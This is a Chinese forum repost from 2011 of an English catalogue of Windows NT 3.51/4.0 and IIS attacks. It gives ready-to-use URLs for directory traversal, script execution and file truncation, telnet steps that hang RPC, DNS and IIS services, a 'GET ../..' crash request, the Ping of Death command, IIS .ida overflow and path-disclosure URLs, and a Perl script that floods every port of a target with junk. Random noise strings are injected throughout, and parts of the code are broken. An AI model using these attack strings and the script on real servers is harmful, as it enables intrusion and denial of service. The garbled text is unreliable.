標(biāo)題: NT的漏洞及描述(英文) [打印本頁] 作者: 雜七雜八 時(shí)間: 2011-1-13 17:12 標(biāo)題: NT的漏洞及描述(英文) 受影響系統(tǒng):4.0,iis 1.0* d; t7 T! c+ S9 E9 U/ `$ q) e) }
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.4 B' J% a1 `$ t7 H$ U
" X+ C/ S9 O& F% j3 OA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.2 G3 A, ?7 A y5 U9 R( T" g( t
7 I) b% J! M3 u- _6 v+ I1 G. x
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.1 S) I% _2 i8 w" i: O6 t
7 z9 H% \' N8 x# e--------------------------------------------------------------------9 ]0 S2 z D/ f; f1 q6 U3 k M
5 J3 m- Y5 r$ z- l+ `. R
受影響系統(tǒng):4.0 & V5 ~8 v9 e0 [1 `! CA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''. 8 u6 |8 O/ B: D) K/ U3 x8 S 1 b# A7 D& h) _( ? z5 y1 R0 mIf the file 'target.bat' exists, the file will be truncated. 4 H; g3 o' t( l ; _$ M" {- `; J' \; ]/ Y8 V) {, } l/ D8 r
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''. D7 j+ O) j3 E* o1 v/ z+ ~2 U; B
----------------------------------------------------------------------1 W' |0 u1 D. ~; r
# o4 g" ?* {4 `受影響系統(tǒng):3.51,4.0 5 s, u, {6 r$ A) T4 SMultiple service ports (53, 135, 1031) are vunerable to 'confusion'. , Y1 F' I/ a8 V( T# B5 m! d0 ~- N9 C6 u" d M+ g. I r
The following steps;! |. |: h4 j" b3 X
' P9 m1 A$ ^: K& k( U7 e
Telnet to an NT 4.0 system on port 135 + R$ X9 U+ [1 g
Type about 10 characters followed by a <CR> * q s9 A" e) [% p0 k4 yExit Telnet - y" v7 Z. @1 E& u( a
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system. ' w' l/ w9 {; S , L3 E3 X7 f J0 |' C/ G! t; p7 `When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.* @5 V2 B3 u0 ]$ b: a7 \, A
; ^: F. k) e/ J/ I& z0 b/ _
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.5 ?9 i. C. W- k/ u% x3 ]+ s# l* d" H
9 z$ r$ y9 u( M! U& C3 O' MIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning. 6 B$ x5 o1 `; Y f8 L7 d) [. t/ E6 Z! f7 J3 W0 }+ e
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):' _3 h6 \. V7 A5 K3 r
8 l7 I1 s2 m( Z+ N1 x7 r7 {
/*begin poke code*/+ V7 P6 Y) { z$ J4 [5 k
8 W4 v& _4 ^* P
use Socket; . \& k& H8 ]2 U' C6 y( e/ Ruse FileHandle;1 n, C4 q6 g# U6 @3 U' k
require "chat2.pl"; - K0 A( }, J" \; @* q& B/ J/ R * h6 D" E, k$ @$systemname = $ARGV[0] && shift; * \: [# }9 A4 i5 s: n0 j* P - W7 r$ m% t# t$verbose = 1; # tell me what you're hitting. A( W0 w- i. B; f. J
$knownports = 1; # don't hit known problem ports" [/ F s) [5 V& ^" Z
for ($port = $0; $port<65535; $port++) 2 Z3 m0 G; Z9 q6 X/ U, I
{ * o3 p) P. g% o. {6 |+ s3 z8 \8 D8 b$ h3 a1 m6 `- U6 E
$ V5 ~8 J$ ~+ ]( \0 W
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {9 H9 d d; k. T; @% B) R3 ^: f
next; : l3 G3 [: t9 k B' e/ [8 t2 d) `} 0 y+ O/ W# D1 R& s* w- }$fh = chat::open_port($systemname, $port);" {# n9 r! @& y( o/ ]. }% F
chat::print ($fh,"This is about ten characters or more"); 4 N# a9 L& j, J# e" [if ($verbose) { . k/ ?% n& e% {0 |: {) S( X7 kprint "Trying port: $port\n"; # C! J9 S# f" p( w% B5 `' g- c} # I* Q, m4 H9 R8 achat::close($fh);) P) D4 O9 L5 h L( k6 `2 u
( g2 J* v+ X. C} ( ^5 I1 L& c m) }$ p& g( u * u1 @& c" f* s, x4 h ! b7 v }6 v% P4 q6 t6 x+ Q/*end poke code*/! V: p! N8 v( \" A1 d; v5 k. o
, }; o4 v2 \, u" ~" ]6 ]: D# i5 U. ESave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername6 q( x5 ?. } O
6 o9 W! p3 ~2 j! O7 S
--------------------------------------------------------------------------------0 M8 I: B( B7 h9 p+ v' C) h
- [" Z/ A7 v" U4 k$ v' L
受影響系統(tǒng):4.0: v0 T$ t8 o$ p" F' W( N' A/ n5 P" U/ Z; M
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.2 b2 J/ G- m g1 J l
; w5 ?& s( n F6 A* l
This attack causes Dr. Watson to display an alert window and to log an error: 1 B( k+ w' e2 ]0 f3 x- ]
0 |( ~, g5 k+ n G8 H* M4 E$ X5 H
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT" 3 H y8 D4 s1 @, V2 _; v - |: F: H- I( \9 [# y3 s-------------------------------------------------------------------------------- - d- ]9 _5 W, M8 M/ u; `: r. D1 }' G$ ~ b
受影響系統(tǒng):3.51,4.0 0 Z0 t' C, P- q# ?7 dLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems: ! w% q1 \( \" W; o9 s) B2 i5 ?1 D8 \$ ~4 ?
STOP: 0X0000001E. K' E" q# |3 w+ b+ {- Y
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS - X1 G4 ~- a+ B: M7 _+ F ; y; r: c2 K3 t5 s. H5 X% T-OR- ! E) E2 ~/ Q5 t6 |1 x. c- w + @3 F5 K! o" r2 c5 [+ B) _STOP: 0x0000000A2 l" f( j* p1 r& p# [% q% i. }+ t
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS * n8 x2 ~$ i% D' Z; t+ Z2 w$ S2 A
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets. 9 t! y2 z2 l* X0 Q; C7 V' n. o0 w+ U8 U3 \: F, L6 P- Y5 Y, x
-------------------------------------------------------------------------------- 7 |, K5 J9 Q# m. `1 c ! @. ^% d2 Q) {- M6 n3 X8 \Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). ' R% `/ ] e0 e
@9 l1 y/ J* w4 `# F( xIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server